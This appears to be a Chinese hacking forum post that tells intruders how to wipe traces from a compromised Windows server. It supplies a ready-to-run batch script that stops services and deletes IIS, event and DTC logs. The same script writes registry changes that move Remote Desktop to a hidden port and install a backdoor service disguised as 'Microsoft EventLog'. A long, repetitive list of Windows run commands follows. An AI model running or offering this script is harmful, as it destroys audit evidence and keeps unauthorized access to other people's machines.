删除日志文件一般是黑客们惯用的打扫现场的做法~~这样别人就没办法知道他在这个电脑上都做了什么。一般的手动删除是没办法实现的,因为你毕竟是在连接对方PC的情况先删除的 最后还会留下你的一些信息,最好的办法就是写一个批处理文件 然后把这个文件放进对方电脑的“启动文件”里面 然后远程重新启动对方电脑,当对方电脑自动重新启动的时候就会自动运行这个批处理 这样对方电脑里面就不会残留你的任何信息!

你可以下载下面的这个程序自动完成

或者使用下面批处理命令 把下面文字复制到一个文本里面 然后重新命名文本格式为批处理格式双吉运行即可

下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。

@regedit /s patch.dll

@net stop w3svc

@net stop event log

@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q

@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q

@del c:\winnt\system32\config\*.event /f /q

@del c:\winnt\system32dtclog\*.* /f /q

@del c:\winnt\*.txt /f /q

@del c:\winnt\*.log /f /q

@net start w3svc

@net start event log

@rem [删除日志]

@net stop lanmanserver /y

@net stop Schedule /y

@net stop RemoteRegistry /y

@del patch.dll

@echo The server has been patched,Have fun.

@del patch.bat

@REM [禁止一些危险的服务。]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] patch.dll

@echo "PortNumber"=dword:00002010 patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp patch.dll

@echo "PortNumber"=dword:00002012 patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] patch.dll

@echo "Start"=dword:00000002 patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] patch.dll

@echo "Start"=dword:00000002 patch.dll

@echo "ErrorControl"=dword:00000001 patch.dll

@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ patch.dll

@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ patch.dll

@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 patch.dll

@echo "ObjectName"="LocalSystem" patch.dll

@echo "Type"=dword:00000010 patch.dll

@echo "Description"="Keep record of the program and windows message。" patch.dll

@echo "DisplayName"="Microsoft EventLog" patch.dll

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] patch.dll

@echo "Start"=dword:00000004 patch.dll

@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe

@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路]

求可以清除日志的命令

explorer-------打开资源管理器

Nslookup-------IP地址侦测器

logoff---------注销命令

tsshutdn-------60秒倒计时关机命令

lusrmgr.msc----本机用户和组

services.msc---本地服务设置

oobe/msoobe /a----检查XP是否激活

notepad--------打开记事本

cleanmgr-------垃圾整理

net start messenger----开始信使服务

compmgmt.msc---计算机管理

net stop messenger-----停止信使服务

conf-----------启动netmeeting

dvdplay--------DVD播放器

charmap--------启动字符映射表

diskmgmt.msc---磁盘管理实用程序

calc-----------启动计算器

dfrg.msc-------磁盘碎片整理程序

chkdsk.exe-----Chkdsk磁盘检查

devmgmt.msc--- 设备管理器

regsvr32 /u *.dll----停止dll文件运行

drwtsn32------ 系统医生

rononce -p ----15秒关机

dxdiag---------检查DirectX信息

regedt32-------注册表编辑器

Msconfig.exe---系统配置实用程序

rsop.msc-------组策略结果集

mem.exe--------显示内存使用情况

regedit.exe----注册表

winchat--------XP自带局域网聊天

progman--------程序管理器

winmsd---------系统信息

perfmon.msc----计算机性能监测程序

winver---------检查Windows版本

sfc /scannow-----扫描错误并复原

taskmgr-----任务管理器(2000/xp/2003

winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构(WMI)

wupdmgr--------windows更新程序

wscript--------windows脚本宿主设置

write----------写字板

winmsd---------系统信息

wiaacmgr-------扫描仪和照相机向导

winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况

Msconfig.exe---系统配置实用程序

mplayer2-------简易widnows media player

mspaint--------画图板

mstsc----------远程桌面连接

mplayer2-------媒体播放机

magnify--------放大镜实用程序

mmc------------打开控制台

mobsync--------同步命令

dxdiag---------检查DirectX信息

drwtsn32------ 系统医生

devmgmt.msc--- 设备管理器

dfrg.msc-------磁盘碎片整理程序

diskmgmt.msc---磁盘管理实用程序

dcomcnfg-------打开系统组件服务

ddeshare-------打开DDE共享设置

dvdplay--------DVD播放器

net stop messenger-----停止信使服务

net start messenger----开始信使服务

notepad--------打开记事本

nslookup-------网络管理的工具向导

ntbackup-------系统备份和还原

narrator-------屏幕“讲述人”

ntmsmgr.msc----移动存储管理器

ntmsoprq.msc---移动存储管理员操作请求

netstat -an----(TC)命令检查接口

syncapp--------创建一个公文包

sysedit--------系统配置编辑器

sigverif-------文件签名验证程序

sndrec32-------录音机

shrpubw--------创建共享文件夹

secpol.msc-----本地安全策略

services.msc---本地服务设置

Sndvol32-------音量控制程序

sfc.exe--------系统文件检查器

sfc /scannow---windows文件保护

tsshutdn-------60秒倒计时关机命令

tourstart------xp简介(安装完成后出现的漫游xp程序)

taskmgr--------任务管理器

eventvwr-------事件查看器

eudcedit-------造字程序

explorer-------打开资源管理器

packager-------对象包装程序

perfmon.msc----计算机性能监测程序

progman--------程序管理器

regedit.exe----注册表

rsop.msc-------组策略结果集

regedt32-------注册表编辑器

rononce -p ----15秒关机

regsvr32 /u *.dll----停止dll文件运行

regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符

chkdsk.exe-----Chkdsk磁盘检查

certmgr.msc----证书管理实用程序

calc-----------启动计算器

charmap--------启动字符映射表

cliconfg-------SQL SERVER 客户端网络实用程序

Clipbrd--------剪贴板查看器

conf-----------启动netmeeting

compmgmt.msc---计算机管理

cleanmgr-------垃圾整理

ciadv.msc------索引服务程序

osk------------打开屏幕键盘

odbcad32-------ODBC数据源管理器

oobe/msoobe /a----检查XP是否激活

lusrmgr.msc----本机用户和组

logoff---------注销命令

iexpress-------木马捆绑工具,系统自带

Nslookup-------IP地址侦测器

fsmgmt.msc-----共享文件夹管理器

utilman--------辅助工具管理器

gpedit.msc-----组策略

1条大神的评论

  • avatar
    访客 2022-10-10 上午 09:52:31

    进行信息共享,就可以禁止。 10.Imapi Cd-burning Com Service:用Imapi管理CD录制,虽然Win XP中内置了此功能,但是我们大多会选择专业刻录

发表评论